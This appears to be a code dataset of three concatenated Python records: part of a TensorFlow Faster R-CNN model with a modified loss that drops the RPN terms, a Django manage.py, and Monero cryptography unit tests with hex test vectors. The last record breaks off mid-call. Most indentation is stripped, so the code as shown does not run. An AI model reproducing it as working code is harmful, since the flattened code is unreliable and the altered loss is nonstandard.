if self._use_matmul_crop_and_resize:
def _single_image_crop_and_resize(inputs):
single_image_features_to_crop, proposal_boxes_normalized = inputs
return ops.matmul_crop_and_resize(
tf.expand_dims(single_image_features_to_crop, 0),
proposal_boxes_normalized,
[self._initial_crop_size, self._initial_crop_size])
cropped_regions = self._flatten_first_two_dimensions(
shape_utils.static_or_dynamic_map_fn(
_single_image_crop_and_resize,
elems=[features_to_crop, proposal_boxes_normalized],
dtype=tf.float32,
parallel_iterations=self._parallel_iterations))
else:
cropped_regions = tf.image.crop_and_resize(
features_to_crop,
self._flatten_first_two_dimensions(proposal_boxes_normalized),
get_box_inds(proposal_boxes_normalized),
(self._initial_crop_size, self._initial_crop_size))
return slim.max_pool2d(
cropped_regions,
[self._maxpool_kernel_size, self._maxpool_kernel_size], # Michele: Being specific to text, we want to preserve width more than height
stride=[self._maxpool_stride, 1])
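  # The asymmetric stride above ([self._maxpool_stride, 1]) pools the cropped
  # features only along the height axis, keeping the full horizontal
  # resolution; per the inline note, this is intended to retain more width
  # information for text-like regions.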
def _postprocess_box_classifier(self,
refined_box_encodings,
class_predictions_with_background,
proposal_boxes,
num_proposals,
image_shapes,
mask_predictions=None):
"""Converts predictions from the second stage box classifier to detections.
Args:
refined_box_encodings: a 3-D float tensor with shape
[total_num_padded_proposals, num_classes, self._box_coder.code_size]
representing predicted (final) refined box encodings. If using a shared
box across classes the shape will instead be
[total_num_padded_proposals, 1, 4]
      class_predictions_with_background: a 3-D float tensor with shape
[total_num_padded_proposals, num_classes + 1] containing class
predictions (logits) for each of the proposals. Note that this tensor
*includes* background class predictions (at class index 0).
proposal_boxes: a 3-D float tensor with shape
[batch_size, self.max_num_proposals, 4] representing decoded proposal
bounding boxes in absolute coordinates.
num_proposals: a 1-D int32 tensor of shape [batch] representing the number
of proposals predicted for each image in the batch.
image_shapes: a 2-D int32 tensor containing shapes of input image in the
batch.
mask_predictions: (optional) a 4-D float tensor with shape
[total_num_padded_proposals, num_classes, mask_height, mask_width]
containing instance mask prediction logits.
Returns:
A dictionary containing:
        `detection_boxes`: [batch, max_detections, 4]
`detection_scores`: [batch, max_detections]
`detection_classes`: [batch, max_detections]
`num_detections`: [batch]
`detection_masks`:
(optional) [batch, max_detections, mask_height, mask_width]. Note
that a pixel-wise sigmoid score converter is applied to the detection
masks.
"""
refined_box_encodings_batch = tf.reshape(
refined_box_encodings,
[-1,
self.max_num_proposals,
refined_box_encodings.shape[1],
self._box_coder.code_size])
class_predictions_with_background_batch = tf.reshape(
class_predictions_with_background,
[-1, self.max_num_proposals, self.num_classes + 1]
)
refined_decoded_boxes_batch = self._batch_decode_boxes(
refined_box_encodings_batch, proposal_boxes)
class_predictions_with_background_batch = (
self._second_stage_score_conversion_fn(
class_predictions_with_background_batch))
class_predictions_batch = tf.reshape(
tf.slice(class_predictions_with_background_batch,
[0, 0, 1], [-1, -1, -1]),
[-1, self.max_num_proposals, self.num_classes])
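    # tf.slice above drops the background column (class index 0), so the
    # per-class scores handed to the second stage NMS below cover only the
    # self.num_classes foreground classes.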
clip_window = self._compute_clip_window(image_shapes)
mask_predictions_batch = None
if mask_predictions is not None:
mask_height = mask_predictions.shape[2].value
mask_width = mask_predictions.shape[3].value
mask_predictions = tf.sigmoid(mask_predictions)
mask_predictions_batch = tf.reshape(
mask_predictions, [-1, self.max_num_proposals,
self.num_classes, mask_height, mask_width])
(nmsed_boxes, nmsed_scores, nmsed_classes, nmsed_masks, _,
num_detections) = self._second_stage_nms_fn(
refined_decoded_boxes_batch,
class_predictions_batch,
clip_window=clip_window,
change_coordinate_frame=True,
num_valid_boxes=num_proposals,
masks=mask_predictions_batch)
detections = {
fields.DetectionResultFields.detection_boxes: nmsed_boxes,
fields.DetectionResultFields.detection_scores: nmsed_scores,
fields.DetectionResultFields.detection_classes: nmsed_classes,
fields.DetectionResultFields.num_detections: tf.to_float(num_detections)
}
if nmsed_masks is not None:
detections[fields.DetectionResultFields.detection_masks] = nmsed_masks
return detections
def _batch_decode_boxes(self, box_encodings, anchor_boxes):
"""Decodes box encodings with respect to the anchor boxes.
Args:
box_encodings: a 4-D tensor with shape
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
representing box encodings.
anchor_boxes: [batch_size, num_anchors, self._box_coder.code_size]
representing decoded bounding boxes. If using a shared box across
classes the shape will instead be
[total_num_proposals, 1, self._box_coder.code_size].
Returns:
decoded_boxes: a
[batch_size, num_anchors, num_classes, self._box_coder.code_size]
float tensor representing bounding box predictions (for each image in
batch, proposal and class). If using a shared box across classes the
shape will instead be
[batch_size, num_anchors, 1, self._box_coder.code_size].
"""
combined_shape = shape_utils.combined_static_and_dynamic_shape(
box_encodings)
num_classes = combined_shape[2]
tiled_anchor_boxes = tf.tile(
tf.expand_dims(anchor_boxes, 2), [1, 1, num_classes, 1])
tiled_anchors_boxlist = box_list.BoxList(
tf.reshape(tiled_anchor_boxes, [-1, 4]))
decoded_boxes = self._box_coder.decode(
tf.reshape(box_encodings, [-1, self._box_coder.code_size]),
tiled_anchors_boxlist)
return tf.reshape(decoded_boxes.get(),
tf.stack([combined_shape[0], combined_shape[1],
num_classes, 4]))
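  # Decoding sketch: the anchors are tiled once per class so every
  # class-specific box encoding is decoded against its own copy of the same
  # anchor, and the flat decoded boxes are then reshaped back to
  # [batch_size, num_anchors, num_classes, 4].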
'''def loss(self, prediction_dict, true_image_shapes, scope=None):
"""Compute scalar loss tensors given prediction tensors.
If number_of_stages=1, only RPN related losses are computed (i.e.,
`rpn_localization_loss` and `rpn_objectness_loss`). Otherwise all
losses are computed.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
        documentation for the predict method). If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
`image_shape`, and `anchors` fields. Otherwise we expect
prediction_dict to additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`, and
`proposal_boxes` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`, 'second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
(groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
loss_dict = self._loss_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'], groundtruth_boxlists,
groundtruth_classes_with_background_list, groundtruth_weights_list)
if self._number_of_stages > 1:
loss_dict.update(
self._loss_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
prediction_dict['image_shape'],
prediction_dict.get('mask_predictions'),
groundtruth_masks_list,
))
return loss_dict'''
def loss(self, prediction_dict, true_image_shapes, scope=None):
"""Compute scalar loss tensors given prediction tensors.
If number_of_stages=1, only RPN related losses are computed (i.e.,
`rpn_localization_loss` and `rpn_objectness_loss`). Otherwise all
losses are computed.
Args:
prediction_dict: a dictionary holding prediction tensors (see the
        documentation for the predict method). If number_of_stages=1, we
expect prediction_dict to contain `rpn_box_encodings`,
`rpn_objectness_predictions_with_background`, `rpn_features_to_crop`,
`image_shape`, and `anchors` fields. Otherwise we expect
prediction_dict to additionally contain `refined_box_encodings`,
`class_predictions_with_background`, `num_proposals`, and
`proposal_boxes` fields.
true_image_shapes: int32 tensor of shape [batch, 3] where each row is
of the form [height, width, channels] indicating the shapes
of true images in the resized images, as resized images can be padded
with zeros.
scope: Optional scope name.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`, 'second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope(scope, 'Loss', prediction_dict.values()):
(groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_masks_list, groundtruth_weights_list
) = self._format_groundtruth_data(true_image_shapes)
'''loss_dict = self._loss_rpn(
prediction_dict['rpn_box_encodings'],
prediction_dict['rpn_objectness_predictions_with_background'],
prediction_dict['anchors'], groundtruth_boxlists,
groundtruth_classes_with_background_list, groundtruth_weights_list)'''
#if self._number_of_stages > 1:
# loss_dict.update(
loss_dict = self._loss_box_classifier(
prediction_dict['refined_box_encodings'],
prediction_dict['class_predictions_with_background'],
prediction_dict['proposal_boxes'],
prediction_dict['num_proposals'],
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
prediction_dict['image_shape'],
prediction_dict.get('mask_predictions'),
groundtruth_masks_list,
)#)
return loss_dict
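  # In this modified variant the RPN losses are commented out above, so the
  # dictionary returned by `loss` contains only the second stage
  # (box classifier) localization and classification terms, plus the mask loss
  # when mask predictions are present.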
def _loss_rpn(self, rpn_box_encodings,
rpn_objectness_predictions_with_background, anchors,
groundtruth_boxlists, groundtruth_classes_with_background_list,
groundtruth_weights_list):
"""Computes scalar RPN loss tensors.
Uses self._proposal_target_assigner to obtain regression and classification
targets for the first stage RPN, samples a "minibatch" of anchors to
participate in the loss computation, and returns the RPN losses.
Args:
rpn_box_encodings: A 4-D float tensor of shape
[batch_size, num_anchors, self._box_coder.code_size] containing
predicted proposal box encodings.
      rpn_objectness_predictions_with_background: A 3-D float tensor of shape
[batch_size, num_anchors, 2] containing objectness predictions
(logits) for each of the anchors with 0 corresponding to background
and 1 corresponding to object.
anchors: A 2-D tensor of shape [num_anchors, 4] representing anchors
for the first stage RPN. Note that `num_anchors` can differ depending
on whether the model is created in training or inference mode.
groundtruth_boxlists: A list of BoxLists containing coordinates of the
groundtruth boxes.
groundtruth_classes_with_background_list: A list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes+1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
[num_boxes] containing weights for groundtruth boxes.
Returns:
a dictionary mapping loss keys (`first_stage_localization_loss`,
`first_stage_objectness_loss`) to scalar tensors representing
corresponding loss values.
"""
with tf.name_scope('RPNLoss'):
(batch_cls_targets, batch_cls_weights, batch_reg_targets,
batch_reg_weights, _) = target_assigner.batch_assign_targets(
target_assigner=self._proposal_target_assigner,
anchors_batch=box_list.BoxList(anchors),
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=(len(groundtruth_boxlists) * [None]),
gt_weights_batch=groundtruth_weights_list)
batch_cls_targets = tf.squeeze(batch_cls_targets, axis=2)
def _minibatch_subsample_fn(inputs):
cls_targets, cls_weights = inputs
return self._first_stage_sampler.subsample(
tf.cast(cls_weights, tf.bool),
self._first_stage_minibatch_size, tf.cast(cls_targets, tf.bool))
batch_sampled_indices = tf.to_float(shape_utils.static_or_dynamic_map_fn(
_minibatch_subsample_fn,
[batch_cls_targets, batch_cls_weights],
dtype=tf.bool,
parallel_iterations=self._parallel_iterations,
back_prop=True))
# Normalize by number of examples in sampled minibatch
normalizer = tf.reduce_sum(batch_sampled_indices, axis=1)
batch_one_hot_targets = tf.one_hot(
tf.to_int32(batch_cls_targets), depth=2)
sampled_reg_indices = tf.multiply(batch_sampled_indices,
batch_reg_weights)
localization_losses = self._first_stage_localization_loss(
rpn_box_encodings, batch_reg_targets, weights=sampled_reg_indices)
objectness_losses = self._first_stage_objectness_loss(
rpn_objectness_predictions_with_background,
batch_one_hot_targets, weights=batch_sampled_indices)
localization_loss = tf.reduce_mean(
tf.reduce_sum(localization_losses, axis=1) / normalizer)
objectness_loss = tf.reduce_mean(
tf.reduce_sum(objectness_losses, axis=1) / normalizer)
localization_loss = tf.multiply(self._first_stage_loc_loss_weight,
localization_loss,
name='localization_loss')
objectness_loss = tf.multiply(self._first_stage_obj_loss_weight,
objectness_loss, name='objectness_loss')
loss_dict = {localization_loss.op.name: localization_loss,
objectness_loss.op.name: objectness_loss}
return loss_dict
def _loss_box_classifier(self,
refined_box_encodings,
class_predictions_with_background,
proposal_boxes,
num_proposals,
groundtruth_boxlists,
groundtruth_classes_with_background_list,
groundtruth_weights_list,
image_shape,
prediction_masks=None,
groundtruth_masks_list=None):
"""Computes scalar box classifier loss tensors.
Uses self._detector_target_assigner to obtain regression and classification
targets for the second stage box classifier, optionally performs
hard mining, and returns losses. All losses are computed independently
for each image and then averaged across the batch.
Please note that for boxes and masks with multiple labels, the box
regression and mask prediction losses are only computed for one label.
This function assumes that the proposal boxes in the "padded" regions are
actually zero (and thus should not be matched to).
Args:
refined_box_encodings: a 3-D tensor with shape
[total_num_proposals, num_classes, box_coder.code_size] representing
predicted (final) refined box encodings. If using a shared box across
classes this will instead have shape
[total_num_proposals, 1, box_coder.code_size].
class_predictions_with_background: a 2-D tensor with shape
[total_num_proposals, num_classes + 1] containing class
predictions (logits) for each of the anchors. Note that this tensor
*includes* background class predictions (at class index 0).
proposal_boxes: [batch_size, self.max_num_proposals, 4] representing
decoded proposal bounding boxes.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
groundtruth_boxlists: a list of BoxLists containing coordinates of the
groundtruth boxes.
groundtruth_classes_with_background_list: a list of 2-D one-hot
(or k-hot) tensors of shape [num_boxes, num_classes + 1] containing the
class targets with the 0th index assumed to map to the background class.
groundtruth_weights_list: A list of 1-D tf.float32 tensors of shape
[num_boxes] containing weights for groundtruth boxes.
image_shape: a 1-D tensor of shape [4] representing the image shape.
prediction_masks: an optional 4-D tensor with shape [total_num_proposals,
num_classes, mask_height, mask_width] containing the instance masks for
each box.
groundtruth_masks_list: an optional list of 3-D tensors of shape
[num_boxes, image_height, image_width] containing the instance masks for
each of the boxes.
Returns:
a dictionary mapping loss keys ('second_stage_localization_loss',
'second_stage_classification_loss') to scalar tensors representing
corresponding loss values.
Raises:
ValueError: if `predict_instance_masks` in
second_stage_mask_rcnn_box_predictor is True and
`groundtruth_masks_list` is not provided.
"""
with tf.name_scope('BoxClassifierLoss'):
paddings_indicator = self._padded_batched_proposals_indicator(
num_proposals, self.max_num_proposals)
proposal_boxlists = [
box_list.BoxList(proposal_boxes_single_image)
for proposal_boxes_single_image in tf.unstack(proposal_boxes)]
batch_size = len(proposal_boxlists)
num_proposals_or_one = tf.to_float(tf.expand_dims(
tf.maximum(num_proposals, tf.ones_like(num_proposals)), 1))
normalizer = tf.tile(num_proposals_or_one,
[1, self.max_num_proposals]) * batch_size
(batch_cls_targets_with_background, batch_cls_weights, batch_reg_targets,
batch_reg_weights, _) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_classes_with_background_list,
unmatched_class_label=tf.constant(
[1] + self._num_classes * [0], dtype=tf.float32),
gt_weights_batch=groundtruth_weights_list)
class_predictions_with_background = tf.reshape(
class_predictions_with_background,
[batch_size, self.max_num_proposals, -1])
flat_cls_targets_with_background = tf.reshape(
batch_cls_targets_with_background,
[batch_size * self.max_num_proposals, -1])
one_hot_flat_cls_targets_with_background = tf.argmax(
flat_cls_targets_with_background, axis=1)
one_hot_flat_cls_targets_with_background = tf.one_hot(
one_hot_flat_cls_targets_with_background,
flat_cls_targets_with_background.get_shape()[1])
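      # The argmax/one_hot round trip above collapses possibly k-hot targets to
      # a single hard label per proposal; it is what selects which class's
      # refined box encoding participates in the regression (and mask) loss in
      # the non-shared-box branch below.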
# If using a shared box across classes use directly
if refined_box_encodings.shape[1] == 1:
reshaped_refined_box_encodings = tf.reshape(
refined_box_encodings,
[batch_size, self.max_num_proposals, self._box_coder.code_size])
# For anchors with multiple labels, picks refined_location_encodings
# for just one class to avoid over-counting for regression loss and
# (optionally) mask loss.
else:
# We only predict refined location encodings for the non background
# classes, but we now pad it to make it compatible with the class
# predictions
refined_box_encodings_with_background = tf.pad(
refined_box_encodings, [[0, 0], [1, 0], [0, 0]])
refined_box_encodings_masked_by_class_targets = tf.boolean_mask(
refined_box_encodings_with_background,
tf.greater(one_hot_flat_cls_targets_with_background, 0))
reshaped_refined_box_encodings = tf.reshape(
refined_box_encodings_masked_by_class_targets,
[batch_size, self.max_num_proposals, self._box_coder.code_size])
second_stage_loc_losses = self._second_stage_localization_loss(
reshaped_refined_box_encodings,
batch_reg_targets, weights=batch_reg_weights) / normalizer
second_stage_cls_losses = ops.reduce_sum_trailing_dimensions(
self._second_stage_classification_loss(
class_predictions_with_background,
batch_cls_targets_with_background,
weights=batch_cls_weights),
ndims=2) / normalizer
second_stage_loc_loss = tf.reduce_sum(
tf.boolean_mask(second_stage_loc_losses, paddings_indicator))
second_stage_cls_loss = tf.reduce_sum(
tf.boolean_mask(second_stage_cls_losses, paddings_indicator))
if self._hard_example_miner:
(second_stage_loc_loss, second_stage_cls_loss
) = self._unpad_proposals_and_apply_hard_mining(
proposal_boxlists, second_stage_loc_losses,
second_stage_cls_losses, num_proposals)
localization_loss = tf.multiply(self._second_stage_loc_loss_weight,
second_stage_loc_loss,
name='localization_loss')
classification_loss = tf.multiply(self._second_stage_cls_loss_weight,
second_stage_cls_loss,
name='classification_loss')
loss_dict = {localization_loss.op.name: localization_loss,
classification_loss.op.name: classification_loss}
second_stage_mask_loss = None
if prediction_masks is not None:
if groundtruth_masks_list is None:
raise ValueError('Groundtruth instance masks not provided. '
'Please configure input reader.')
unmatched_mask_label = tf.zeros(image_shape[1:3], dtype=tf.float32)
(batch_mask_targets, _, _, batch_mask_target_weights,
_) = target_assigner.batch_assign_targets(
target_assigner=self._detector_target_assigner,
anchors_batch=proposal_boxlists,
gt_box_batch=groundtruth_boxlists,
gt_class_targets_batch=groundtruth_masks_list,
unmatched_class_label=unmatched_mask_label,
gt_weights_batch=groundtruth_weights_list)
        # Pad the prediction_masks with zeros for the background class so they
        # are consistent with the class predictions.
if prediction_masks.get_shape().as_list()[1] == 1:
# Class agnostic masks or masks for one-class prediction. Logic for
# both cases is the same since background predictions are ignored
# through the batch_mask_target_weights.
prediction_masks_masked_by_class_targets = prediction_masks
else:
prediction_masks_with_background = tf.pad(
prediction_masks, [[0, 0], [1, 0], [0, 0], [0, 0]])
prediction_masks_masked_by_class_targets = tf.boolean_mask(
prediction_masks_with_background,
tf.greater(one_hot_flat_cls_targets_with_background, 0))
mask_height = prediction_masks.shape[2].value
mask_width = prediction_masks.shape[3].value
reshaped_prediction_masks = tf.reshape(
prediction_masks_masked_by_class_targets,
[batch_size, -1, mask_height * mask_width])
batch_mask_targets_shape = tf.shape(batch_mask_targets)
flat_gt_masks = tf.reshape(batch_mask_targets,
[-1, batch_mask_targets_shape[2],
batch_mask_targets_shape[3]])
# Use normalized proposals to crop mask targets from image masks.
flat_normalized_proposals = box_list_ops.to_normalized_coordinates(
box_list.BoxList(tf.reshape(proposal_boxes, [-1, 4])),
image_shape[1], image_shape[2]).get()
flat_cropped_gt_mask = tf.image.crop_and_resize(
tf.expand_dims(flat_gt_masks, -1),
flat_normalized_proposals,
tf.range(flat_normalized_proposals.shape[0].value),
[mask_height, mask_width])
batch_cropped_gt_mask = tf.reshape(
flat_cropped_gt_mask,
[batch_size, -1, mask_height * mask_width])
second_stage_mask_losses = ops.reduce_sum_trailing_dimensions(
self._second_stage_mask_loss(
reshaped_prediction_masks,
batch_cropped_gt_mask,
weights=batch_mask_target_weights),
ndims=2) / (
mask_height * mask_width * tf.maximum(
tf.reduce_sum(
batch_mask_target_weights, axis=1, keep_dims=True
), tf.ones((batch_size, 1))))
second_stage_mask_loss = tf.reduce_sum(
tf.boolean_mask(second_stage_mask_losses, paddings_indicator))
if second_stage_mask_loss is not None:
mask_loss = tf.multiply(self._second_stage_mask_loss_weight,
second_stage_mask_loss, name='mask_loss')
loss_dict[mask_loss.op.name] = mask_loss
return loss_dict
def _padded_batched_proposals_indicator(self,
num_proposals,
max_num_proposals):
"""Creates indicator matrix of non-pad elements of padded batch proposals.
Args:
num_proposals: Tensor of type tf.int32 with shape [batch_size].
max_num_proposals: Maximum number of proposals per image (integer).
Returns:
A Tensor of type tf.bool with shape [batch_size, max_num_proposals].
"""
batch_size = tf.size(num_proposals)
tiled_num_proposals = tf.tile(
tf.expand_dims(num_proposals, 1), [1, max_num_proposals])
tiled_proposal_index = tf.tile(
tf.expand_dims(tf.range(max_num_proposals), 0), [batch_size, 1])
return tf.greater(tiled_num_proposals, tiled_proposal_index)
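  # E.g. (illustrative): num_proposals = [2, 3] with max_num_proposals = 4
  # yields the indicator [[True, True, False, False],
  #                       [True, True, True, False]].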
def _unpad_proposals_and_apply_hard_mining(self,
proposal_boxlists,
second_stage_loc_losses,
second_stage_cls_losses,
num_proposals):
"""Unpads proposals and applies hard mining.
Args:
      proposal_boxlists: A list of `batch_size` BoxLists, each containing
        `self.max_num_proposals` decoded proposal bounding boxes for its
        image.
second_stage_loc_losses: A Tensor of type `float32`. A tensor of shape
`[batch_size, self.max_num_proposals]` representing per-anchor
second stage localization loss values.
second_stage_cls_losses: A Tensor of type `float32`. A tensor of shape
`[batch_size, self.max_num_proposals]` representing per-anchor
second stage classification loss values.
num_proposals: A Tensor of type `int32`. A 1-D tensor of shape [batch]
representing the number of proposals predicted for each image in
the batch.
Returns:
second_stage_loc_loss: A scalar float32 tensor representing the second
stage localization loss.
second_stage_cls_loss: A scalar float32 tensor representing the second
stage classification loss.
"""
for (proposal_boxlist, single_image_loc_loss, single_image_cls_loss,
single_image_num_proposals) in zip(
proposal_boxlists,
tf.unstack(second_stage_loc_losses),
tf.unstack(second_stage_cls_losses),
tf.unstack(num_proposals)):
proposal_boxlist = box_list.BoxList(
tf.slice(proposal_boxlist.get(),
[0, 0], [single_image_num_proposals, -1]))
single_image_loc_loss = tf.slice(single_image_loc_loss,
[0], [single_image_num_proposals])
single_image_cls_loss = tf.slice(single_image_cls_loss,
[0], [single_image_num_proposals])
return self._hard_example_miner(
location_losses=tf.expand_dims(single_image_loc_loss, 0),
cls_losses=tf.expand_dims(single_image_cls_loss, 0),
decoded_boxlist_list=[proposal_boxlist])
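  # Note: the `return` above sits inside the loop over the batch, so hard
  # example mining is effectively applied only to the first image of the
  # batch; the sliced losses exclude the zero-padded proposal entries.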
def restore_map(self,
fine_tune_checkpoint_type='detection',
load_all_detection_checkpoint_vars=False):
"""Returns a map of variables to load from a foreign checkpoint.
See parent class for details.
Args:
fine_tune_checkpoint_type: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Valid values: `detection`, `classification`. Default 'detection'.
load_all_detection_checkpoint_vars: whether to load all variables (when
`fine_tune_checkpoint_type` is `detection`). If False, only variables
within the feature extractor scopes are included. Default False.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
Raises:
ValueError: if fine_tune_checkpoint_type is neither `classification`
nor `detection`.
"""
if fine_tune_checkpoint_type not in ['detection', 'classification']:
raise ValueError('Not supported fine_tune_checkpoint_type: {}'.format(
fine_tune_checkpoint_type))
if fine_tune_checkpoint_type == 'classification':
return self._feature_extractor.restore_from_classification_checkpoint_fn(
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope)
variables_to_restore = tf.global_variables()
variables_to_restore.append(slim.get_or_create_global_step())
# Only load feature extractor variables to be consistent with loading from
# a classification checkpoint.
include_patterns = None
if not load_all_detection_checkpoint_vars:
include_patterns = [
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope
]
feature_extractor_variables = tf.contrib.framework.filter_variables(
variables_to_restore, include_patterns=include_patterns)
return {var.op.name: var for var in feature_extractor_variables}
 | [def_use_chains data omitted: long nested list of integer offset pairs] |
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'translate.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
 | [def_use_chains data omitted: long nested list of integer offset pairs] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Dusan Klinec, ph4r05, 2018
import binascii
from binascii import unhexlify
import unittest
import aiounittest
from monero_glue.xmr import common, crypto
from monero_glue.xmr.core import ec_py
class CryptoTest(aiounittest.AsyncTestCase):
"""Simple tests"""
def __init__(self, *args, **kwargs):
super(CryptoTest, self).__init__(*args, **kwargs)
def test_ed_crypto(self):
sqr = ec_py.fe_expmod(ec_py.py_fe_sqrtm1, 2)
self.assertEqual(sqr, ec_py.fe_mod(-1))
self.assertEqual(
ec_py.py_fe_A, ec_py.fe_mod(2 * (1 - ec_py.d) * ec_py.inv(1 + ec_py.py_d))
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb1, 2),
ec_py.fe_mod(-2 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb2, 2),
ec_py.fe_mod(2 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb3, 2),
ec_py.fe_mod(-ec_py.py_fe_sqrtm1 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
self.assertEqual(
ec_py.fe_expmod(ec_py.py_fe_fffb4, 2),
ec_py.fe_mod(ec_py.py_fe_sqrtm1 * ec_py.py_fe_A * (ec_py.py_fe_A + 2)),
)
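    # The assertions above restate, in test form, the defining relations of the
    # pure-python backend constants: sqrtm1 squares to -1, A equals
    # 2*(1 - d)/(1 + d), fffb1/fffb2 square to -2*A*(A + 2) and 2*A*(A + 2),
    # and fffb3/fffb4 square to -sqrtm1*A*(A + 2) and sqrtm1*A*(A + 2), all
    # modulo the field prime.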
def test_encoding(self):
point = unhexlify(
b"2486224797d05cae3cba4be043be2db0df381f3f19cfa113f86ab38e3d8d2bd0"
)
self.assertEqual(point, crypto.encodepoint(crypto.decodepoint(point)))
self.assertTrue(
crypto.point_eq(
crypto.decodepoint(point),
crypto.decodepoint(crypto.encodepoint(crypto.decodepoint(point))),
)
)
def test_scalarmult_base(self):
scalar = crypto.decodeint(
unhexlify(
b"a0eea49140a3b036da30eacf64bd9d56ce3ef68ba82ef13571ec511edbcf8303"
)
)
exp = unhexlify(
b"16bb4a3c44e2ced511fc0d4cd86b13b3af21efc99fb0356199fac489f2544c09"
)
res = crypto.scalarmult_base(scalar)
self.assertEqual(exp, crypto.encodepoint(res))
self.assertTrue(crypto.point_eq(crypto.decodepoint(exp), res))
scalar = crypto.decodeint(
unhexlify(
b"fd290dce39f781aebbdbd24584ed6d48bd300de19d9c3decfda0a6e2c6751d0f"
)
)
exp = unhexlify(
b"123daf90fc26f13c6529e6b49bfed498995ac383ef19c0db6771143f24ba8dd5"
)
res = crypto.scalarmult_base(scalar)
self.assertEqual(exp, crypto.encodepoint(res))
self.assertTrue(crypto.point_eq(crypto.decodepoint(exp), res))
def test_scalarmult(self):
priv = unhexlify(
b"3482fb9735ef879fcae5ec7721b5d3646e155c4fb58d6cc11c732c9c9b76620a"
)
pub = unhexlify(
b"2486224797d05cae3cba4be043be2db0df381f3f19cfa113f86ab38e3d8d2bd0"
)
exp = unhexlify(
b"adcd1f5881f46f254900a03c654e71950a88a0236fa0a3a946c9b8daed6ef43d"
)
res = crypto.scalarmult(crypto.decodepoint(pub), crypto.decodeint(priv))
self.assertEqual(exp, crypto.encodepoint(res))
self.assertTrue(crypto.point_eq(crypto.decodepoint(exp), res))
def test_cn_fast_hash(self):
inp = unhexlify(
b"259ef2aba8feb473cf39058a0fe30b9ff6d245b42b6826687ebd6b63128aff6405"
)
res = crypto.cn_fast_hash(inp)
self.assertEqual(
res,
unhexlify(
b"86db87b83fb1246efca5f3b0db09ce3fa4d605b0d10e6507cac253dd31a3ec16"
),
)
def test_hash_to_scalar(self):
inp = unhexlify(
b"259ef2aba8feb473cf39058a0fe30b9ff6d245b42b6826687ebd6b63128aff6405"
)
res = crypto.hash_to_scalar(inp)
exp = crypto.decodeint(binascii.unhexlify(
b"9907925b254e12162609fc0dfd0fef2aa4d605b0d10e6507cac253dd31a3ec06"))
self.assertTrue(crypto.sc_eq(res, exp))
def test_hash_to_point(self):
data = unhexlify(
b"42f6835bf83114a1f5f6076fe79bdfa0bd67c74b88f127d54572d3910dd09201"
)
res = crypto.hash_to_point(data)
res_p = crypto.encodepoint(res)
self.assertEqual(
res_p,
unhexlify(
b"54863a0464c008acc99cffb179bc6cf34eb1bbdf6c29f7a070a7c6376ae30ab5"
),
)
def test_derivation_to_scalar(self):
derivation = unhexlify(
b"e720a09f2e3a0bbf4e4ba7ad93653bb296885510121f806acb2a5f9168fafa01"
)
scalar = unhexlify(
b"25d08763414c379aa9cf989cdcb3cadd36bd5193b500107d6bf5f921f18e470e"
)
sc_int = crypto.derivation_to_scalar(crypto.decodepoint(derivation), 0)
self.assertEqual(scalar, crypto.encodeint(sc_int))
def test_generate_key_derivation(self):
key_pub = crypto.decodepoint(
unhexlify(
b"7739c95d3298e2f87362dba9e0e0b3980a692ae8e2f16796b0e382098cd6bd83"
)
)
key_priv = crypto.decodeint(
unhexlify(
b"3482fb9735ef879fcae5ec7721b5d3646e155c4fb58d6cc11c732c9c9b76620a"
)
)
deriv_exp = unhexlify(
b"fa188a45a0e4daccc0e6d4f6f6858fd46392104be74183ec0047e7e9f4eaf739"
)
self.assertEqual(
deriv_exp,
